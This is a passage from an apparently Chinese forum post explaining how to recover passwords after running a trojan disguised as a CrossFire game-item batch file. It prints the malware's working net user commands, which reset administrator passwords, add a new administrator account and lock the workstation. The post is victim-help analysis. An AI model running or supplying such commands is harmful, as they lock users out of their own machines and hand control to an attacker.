(如果接收到此类文件最后不要直接双击运行,而要编辑方式打开查看内容),这两种文件密码是明文形式,只要右键编辑打开就能找到密码。CF蓝水晶转英雄级.bat文件打开其内容是:
net user Administrator wsad1234+- -----wsad1234+-即为Administrator帐号对应的密码
net user admin zouzou1314520 -----zouzou1314520即为admin 和要密码加753767785$帐号对应密码
net user 要密码加Q2697588286$ zouzou1314520 /add
net localgroup administrators 要密码加753767785$ /add
rundll32 user32,LockWorkStation
下面对这几行脚本进行简单说明:
net user Administrator wsad1234+- 更改用户名为Administrator 密码为wsad1234+-
net user 要密码加Q2697588286$ zouzou1314520 /add 新建一个用户名为要密码加Q2697588286$密码为zouzou1314520的帐户,默认为user组成员。
net localgroup administrators 要密码加753767785$ /add 把用户名要密码加753767785$添加到administrators 组(管理员组)
针对exe格式的可执行文件,需要使用行为监控工具MD来进行破解,首先是安装此软件(下载地址http://dl.pconline.com.cn/download/52312.html),然后在设置里面改成“正常模式”,接着就运行病毒,进行一步一步监控,等到出现对应更改密码命令行,就可以看到密码了,如下qaz123,其更改密码命令还是使用net user 用户名 密码
发表于 2016-1-13 12:22:30
发表于 2016-1-13 12:34:27
发表于 2016-1-13 16:23:15
